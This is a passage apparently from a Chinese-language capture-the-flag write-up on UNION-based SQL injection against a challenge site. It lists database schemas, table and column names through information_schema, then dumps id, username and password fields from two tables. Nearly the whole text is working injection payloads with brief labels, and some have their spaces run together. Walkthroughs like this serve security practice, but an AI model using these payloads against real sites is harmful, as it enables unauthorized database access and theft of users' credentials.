1' union select 1,group_concat(schema_name),3from information_schema.schemata#
查看表名
1 2 3 4
1' unionselect1,2,group_concat(table_name) from information_schema.tableswhere table_schema='geek'#
或者爆表 1' unionselect1,2,group_concat(table_name) from information_schema.tableswhere table_schema=database()#
查看两个表的列名
1 2 3 4 5 6
查看第一个表 1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='geekuser'#
查看第二个表 1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'# 发现两表结果相同
查看id,username,password的内容
1
1' union select 1,2,group_concat(id,username,password) from geekuser#
查看另一个表的id,username,password的内容
1
1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1#